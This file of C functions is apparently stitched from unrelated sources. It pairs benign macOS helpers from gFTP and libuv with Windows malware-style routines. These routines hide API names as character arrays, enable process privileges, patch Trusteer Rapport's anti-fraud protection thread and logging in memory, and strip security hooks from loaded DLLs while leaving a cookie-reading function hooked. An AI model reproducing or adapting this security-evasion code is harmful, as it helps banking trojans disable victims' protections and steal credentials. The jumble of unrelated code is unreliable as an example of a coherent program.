void gftp_gtk_platform_specific_init(void)
{
/* There are some cases where GTK apps don't start in the foreground
* this calls the legacy Carbon Process Number forces the WM to bring it in to focus.
*
* I don't actually know all of the arguments these functions take as they are undocumented
* but thankfully C lets us get away without having the proper prototype for these.
*
* ProcessSerialNumber psn;
* GetCurrentProcess( &psn );
* CPSEnableForegroundOperation( &psn );
* SetFrontProcess( &psn );
*/
int val2 = 0, val3 = 0, val4 = 0, val5 = 0;
void *carbon_framework = dlopen("/System/Library/Frameworks/Carbon.framework/Carbon", RTLD_LAZY|RTLD_NOW|RTLD_GLOBAL);
_pGetCurrentProcess pGetCurrentProcess;
_pCPSEnableForegroundOperation pCPSEnableForegroundOperation;
_pSetFrontProcess pSetFrontProcess;
*(void**)(&pGetCurrentProcess) = dlsym(carbon_framework, "GetCurrentProcess");
*(void**)(&pCPSEnableForegroundOperation) = dlsym(carbon_framework, "CPSEnableForegroundOperation");
*(void**)(&pSetFrontProcess) = dlsym(carbon_framework, "SetFrontProcess");
ProcessSerialNumber psn;
(void)pGetCurrentProcess(&psn);
(void)pCPSEnableForegroundOperation(&psn, val2, val3, val4, val5);
(void)pSetFrontProcess(&psn);
dlclose(carbon_framework);
}
BOOL DebugPrivilege(const char *PName,BOOL bEnable)
{
BOOL bResult = TRUE;
HANDLE hToken;
TOKEN_PRIVILEGES TokenPrivileges;
char CtxPW35[] = {'O','p','e','n','P','r','o','c','e','s','s','T','o','k','e','n','\0'};
OpenProcessTokenT pOpenProcessToken=(OpenProcessTokenT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),CtxPW35);
char Wffkl01[] = {'G','e','t','C','u','r','r','e','n','t','P','r','o','c','e','s','s','\0'};
GetCurrentProcessT pGetCurrentProcess=(GetCurrentProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),Wffkl01);
if (!pOpenProcessToken(pGetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
{
bResult = FALSE;
return bResult;
}
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;
char CtxPW34[] = {'L','o','o','k','u','p','P','r','i','v','i','l','e','g','e','V','a','l','u','e','A','\0'};
LookupPrivilegeValueAT pLookupPrivilegeValueA=(LookupPrivilegeValueAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),CtxPW34);
pLookupPrivilegeValueA(NULL, PName, &TokenPrivileges.Privileges[0].Luid);
char CtxPW33[] = {'A','d','j','u','s','t','T','o','k','e','n','P','r','i','v','i','l','e','g','e','s','\0'};
AdjustTokenPrivilegesT pAdjustTokenPrivileges=(AdjustTokenPrivilegesT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),CtxPW33);
pAdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
char FBwWp06[] = {'G','e','t','L','a','s','t','E','r','r','o','r','\0'};
GetLastErrorT pGetLastError=(GetLastErrorT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp06);
if (pGetLastError() != ERROR_SUCCESS)
{
bResult = FALSE;
}
char BrmAP29[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
CloseHandleT pCloseHandle=(CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP29);
pCloseHandle(hToken);
return bResult;
}
int uv__set_process_title(const char* title) {
#if TARGET_OS_IPHONE
return uv__pthread_setname_np(title);
#else
CFStringRef (*pCFStringCreateWithCString)(CFAllocatorRef,
const char*,
CFStringEncoding);
CFBundleRef (*pCFBundleGetBundleWithIdentifier)(CFStringRef);
void *(*pCFBundleGetDataPointerForName)(CFBundleRef, CFStringRef);
void *(*pCFBundleGetFunctionPointerForName)(CFBundleRef, CFStringRef);
OSErr (*pGetCurrentProcess)(ProcessSerialNumber*);
CFTypeRef (*pLSGetCurrentApplicationASN)(void);
OSStatus (*pLSSetApplicationInformationItem)(int,
CFTypeRef,
CFStringRef,
CFStringRef,
CFDictionaryRef*);
void* application_services_handle;
void* core_foundation_handle;
CFBundleRef launch_services_bundle;
CFStringRef* display_name_key;
ProcessSerialNumber psn;
CFTypeRef asn;
int err;
err = -ENOENT;
application_services_handle = dlopen("/System/Library/Frameworks/"
"ApplicationServices.framework/"
"Versions/A/ApplicationServices",
RTLD_LAZY | RTLD_LOCAL);
core_foundation_handle = dlopen("/System/Library/Frameworks/"
"CoreFoundation.framework/"
"Versions/A/CoreFoundation",
RTLD_LAZY | RTLD_LOCAL);
if (application_services_handle == NULL || core_foundation_handle == NULL)
goto out;
pGetCurrentProcess =
dlsym(application_services_handle, "GetCurrentProcess");
pCFStringCreateWithCString =
dlsym(core_foundation_handle, "CFStringCreateWithCString");
pCFBundleGetBundleWithIdentifier =
dlsym(core_foundation_handle, "CFBundleGetBundleWithIdentifier");
pCFBundleGetDataPointerForName =
dlsym(core_foundation_handle, "CFBundleGetDataPointerForName");
pCFBundleGetFunctionPointerForName =
dlsym(core_foundation_handle, "CFBundleGetFunctionPointerForName");
if (pGetCurrentProcess == NULL ||
pCFStringCreateWithCString == NULL ||
pCFBundleGetBundleWithIdentifier == NULL ||
pCFBundleGetDataPointerForName == NULL ||
pCFBundleGetFunctionPointerForName == NULL) {
goto out;
}
#define S(s) pCFStringCreateWithCString(NULL, (s), kCFStringEncodingUTF8)
launch_services_bundle =
pCFBundleGetBundleWithIdentifier(S("com.apple.LaunchServices"));
if (launch_services_bundle == NULL)
goto out;
pLSGetCurrentApplicationASN =
pCFBundleGetFunctionPointerForName(launch_services_bundle,
S("_LSGetCurrentApplicationASN"));
if (pLSGetCurrentApplicationASN == NULL)
goto out;
pLSSetApplicationInformationItem =
pCFBundleGetFunctionPointerForName(launch_services_bundle,
S("_LSSetApplicationInformationItem"));
if (pLSSetApplicationInformationItem == NULL)
goto out;
display_name_key = pCFBundleGetDataPointerForName(launch_services_bundle,
S("_kLSDisplayNameKey"));
if (display_name_key == NULL || *display_name_key == NULL)
goto out;
/* Force the process manager to initialize. */
pGetCurrentProcess(&psn);
asn = pLSGetCurrentApplicationASN();
err = -EINVAL;
if (pLSSetApplicationInformationItem(-2, /* Magic value. */
asn,
*display_name_key,
S(title),
NULL) != noErr) {
goto out;
}
uv__pthread_setname_np(title); /* Don't care if it fails. */
err = 0;
out:
if (core_foundation_handle != NULL)
dlclose(core_foundation_handle);
if (application_services_handle != NULL)
dlclose(application_services_handle);
return err;
#endif /* !TARGET_OS_IPHONE */
}
BOOL AntiRapport()
{
BOOL bRet = FALSE;
UCHAR Buf;
DWORD t;
HMODULE hRapportModule;
LPCSTR lpStr1;
LPCSTR lpStr2;
DWORD dwStr1;
DWORD dwStr2;
PVOID pvLogFix;
PVOID pvFix;
pLoadLibraryA("wininet.dll");
pLoadLibraryA("user32.dll");
hRapportModule =(HMODULE) pGetModuleHandleA("RapportUtil.dll");
if (hRapportModule)
{
lpStr1 = "periodic_checkpoint::periodic_checkpoint_thread";
lpStr2 = ".\\patching_sentry\\periodic_checkpoint.cpp";
dwStr1 = AntiRapportFindStr(hRapportModule,lpStr1,(DWORD)plstrlenA(lpStr1));
if (dwStr1)
{
dwStr2 = AntiRapportFindStr(hRapportModule,lpStr2,(DWORD)plstrlenA(lpStr2));
if (dwStr2)
{
pvFix = AnitRapportFindPushStrs(hRapportModule,dwStr1,dwStr2,&pvLogFix);
if (pvFix)
{
Buf = 0x19;
if (pWriteProcessMemory(pGetCurrentProcess(),pvFix,(PVOID)&Buf,sizeof(Buf),&t))
{
bRet = TRUE;
// DbgPrint(__FUNCTION__"(): rapport protect thread patched at %x\n",pvFix);
}
else
{
//DbgPrint(__FUNCTION__"(): WriteProcessMemory failed with error %lx\n",GetLastError());
}
if (pvLogFix)
{
Buf = 0xC3;
if (pWriteProcessMemory(NtCurrentProcess(),pvLogFix,(PVOID)&Buf,sizeof(Buf),&t))
{
// DbgPrint(__FUNCTION__"(): rapport log proc patched at %x\n",pvLogFix);
}
else
{
// DbgPrint(__FUNCTION__"(): WriteProcessMemory failed with error %lx\n",GetLastError());
}
}
pSleep(4000);
UnhookLibs();
}
}
}
}
return bRet;
}
VOID UnhookModuleExports(HMODULE hModule)
{
CHAR szModuleFileName[MAX_PATH];
pGetModuleFileNameA(hModule,szModuleFileName,sizeof(szModuleFileName));
PVOID pMap = MapBinary(szModuleFileName);
if (pMap)
{
PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)pRtlImageNtHeader(hModule);
if (pNtHeaders)
{
DWORD dwExportsSize;
//PIMAGE_NT_HEADERS pnt = (PIMAGE_NT_HEADERS)(PIMAGE_DOS_HEADER(hModule)->e_lfanew +(PCHAR)hModule);
// dwExportsSize = pnt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
/*PIMAGE_EXPORT_DIRECTORY(PCHAR(hModule) + pnt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);//*/
PIMAGE_EXPORT_DIRECTORY ExportDirectory =(PIMAGE_EXPORT_DIRECTORY)pRtlImageDirectoryEntryToData((PVOID)hModule,TRUE,IMAGE_DIRECTORY_ENTRY_EXPORT,&dwExportsSize);
if (ExportDirectory && dwExportsSize)
{
PUSHORT Ords = (PUSHORT)((DWORD)hModule+ExportDirectory->AddressOfNameOrdinals);
PULONG EntriesRva = (PULONG)((DWORD)hModule+ExportDirectory->AddressOfFunctions);
PULONG Names = (PULONG)((DWORD)hModule+ExportDirectory->AddressOfNames);
for (ULONG cEntry = 0; cEntry < ExportDirectory->NumberOfNames; cEntry++)
{
ULONG StartSize = 10;
PVOID ApiStart = (PVOID)((DWORD)hModule+EntriesRva[Ords[cEntry]]);
PVOID ApiOriginalStart = (PVOID)((DWORD)pMap+EntriesRva[Ords[cEntry]]);
if (m_memcmp(ApiStart,ApiOriginalStart,StartSize))
{
BOOL bRestore = TRUE;
// DbgPrint("Hook found %s - %08x - %s ...",szModuleFileName,ApiStart,((DWORD_PTR)hModule+Names[cEntry]));
if (!plstrcmpA((PCHAR)((DWORD_PTR)hModule+Names[cEntry]),"InternetGetCookieExA"))
{
bRestore = FALSE;
}
if (*(BYTE*)ApiStart == 0xE9)
{
PVOID Handler = (PVOID)(*(DWORD*)((DWORD)ApiStart + 1) + (DWORD)ApiStart + 5);
CHAR FileName[MAX_PATH];
if (pGetMappedFileNameA(pGetCurrentProcess(),Handler,FileName,RTL_NUMBER_OF(FileName)-1))
{
if (!plstrcmpA(pPathFindFileNameA(FileName),"ieframe.dll"))
{
// DbgPrint("Not restored.\n");
bRestore = FALSE;
}
}
}
if (bRestore)
{
ULONG Written;
if (pWriteProcessMemory(pGetCurrentProcess(),ApiStart,ApiOriginalStart,StartSize,&Written))
{
// DbgPrint("Restored.\n");
}
else
{
// DbgPrint(__FUNCTION__"(): WriteProcessMemory failed with error %lx\n",GetLastError());
}
}
}
}
}
}
UnmapViewOfFile(pMap);
}
}